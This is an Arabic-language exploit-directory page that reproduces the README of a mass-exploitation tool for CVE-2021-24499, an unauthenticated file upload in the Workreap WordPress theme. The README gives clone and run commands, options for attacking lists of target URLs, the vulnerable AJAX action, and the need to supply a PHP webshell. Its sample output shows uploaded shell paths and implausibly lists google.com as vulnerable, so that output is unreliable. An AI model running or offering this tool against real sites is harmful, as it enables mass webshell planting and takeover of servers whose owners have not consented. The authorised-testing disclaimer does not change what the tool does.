Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-24499 — قالب ووردبريس Workreap 2.2.2 - رفع بدون مصادقة يؤدي إلى تنفيذ كود عن بُعد | Kitploit
أدوات/GitHubGitHub/jayhutajulu1/cve-2021-24499
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

قالب ووردبريس Workreap 2.2.2 - رفع بدون مصادقة يؤدي إلى تنفيذ كود عن بُعد

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-24499 | Workreap - سوق العمل الحر والدليل قالب ووردبريس < 2.2.2 - رفع ملفات تعسفي

CVE License Shell

قالب ووردبريس Workreap 2.2.2 - رفع ملفات غير مصادق عليه يؤدي إلى تنفيذ كود عن بُعد

أداة استغلال قوية ودقيقة للاستغلال الجماعي لثغرة CVE-2021-24499 في قالب Workreap لووردبريس. يتيح هذا الاستغلال رفع ملفات غير مصادق عليه مما قد يؤدي إلى تنفيذ كود عن بُعد (RCE).

📝 الوصف

CVE-2021-24499 هي ثغرة حرجة في قالب ووردبريس Workreap (الإصدار 2.2.2 وما دون) تسمح للمستخدمين غير المصادق عليهم برفع ملفات تعسفية، بما في ذلك ملفات PHP، عبر إجراء AJAX الخاص بـ workreap_award_temp_file_uploader. يمكن أن يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) على الخادم المستهدف.

الإصدارات المعرضة للخطر: جميع الإصدارات حتى 2.2.2 وما يشملها

درجة CVSS: حرجة

📦 المتطلبات

  • قشرة Bash (Linux/macOS/WSL)
  • أداة سطر الأوامر curl
  • ملف opts.php أو shell.php (قشرة ويب PHP)
  • 🔧 التثبيت

    1. استنساخ هذا المستودع:
    root@kitploit:~
    git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
    cd CVE-2021-24499
    
    1. اجعل السكربت قابلاً للتنفيذ:
    root@kitploit:~
    chmod +x exploit.sh
    
    1. تأكد من وجود opts.php أو shell.php في نفس الدليل (قشرة الويب PHP الخاصة بك)

    🚀 الاستخدام

    الاستخدام الأساسي

    هدف واحد:

    root@kitploit:~
    ./exploit.sh -u http://target.com
    

    أهداف متعددة (من ملف):

    root@kitploit:~
    ./exploit.sh -l targets.txt
    

    إظهار المساعدة:

    root@kitploit:~
    ./exploit.sh --help
    

    خيارات سطر الأوامر

    الخيارالوصف
    -u URLاستغلال هدف واحد عبر عنوان URL
    -l FILEاستغلال أهداف متعددة من ملف (عنوان URL واحد في كل سطر)
    --helpإظهار قائمة المساعدة

    تنسيق ملف الأهداف

    أنشئ ملفًا نصيًا يحتوي على عنوان URL واحد في كل سطر:

    root@kitploit:~
    http://target1.com
    https://target2.com
    http://target3.com
    

    📸 أمثلة

    المثال 1: استغلال هدف واحد

    root@kitploit:~
    $ ./exploit.sh -u https://domain.com
    
    WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
    Made by Jay Maranatha Hutajulu
    
    https://domain.com/ >> VULNERABLE! 
     --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
    

    المثال 2: الاستغلال الجماعي

    root@kitploit:~
    $ ./exploit.sh -l targets.txt
    
    WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
    Made by Jay Maranatha Hutajulu
    
    https://domain.com >> NOT VULNERABLE!
    https://www.google.com >> VULNERABLE!
    https://www.domain.com >> NOT VULNERABLE!
    https://google.com >> VULNERABLE!
    

    ⚠️ إخلاء المسؤولية

    هذه الأداة مقدمة لأغراض تعليمية والاختبار المصرح به فقط.

    • لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها
    • لا تستخدم هذه الأداة في أي أنشطة غير قانونية
    • المؤلفون والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
    • تأكد دائمًا من حصولك على التفويض المناسب قبل اختبار أي نظام
    • استخدمها بمسؤولية وأخلاقية

    باستخدامك لهذه الأداة، فإنك توافق على استخدامها فقط لأغراض اختبار الأمان والبحث المشروعة.

    🔗 المراجع

    • Exploit-DB
    • Wordfence
    • WP-Scan

    👤 الاعتمادات

    المؤلف: Jay Maranatha Hutajulu

    📄 الترخيص

    هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

    🤝 المساهمة

    المساهمات والقضايا وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة القضايا.

    ⭐ تاريخ النجوم

    إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة ⭐


    تذكير: استخدم دائمًا أدوات الأمان بمسؤولية وأخلاقية. اختبار سعيد! 🚀

    تنزيل الأداة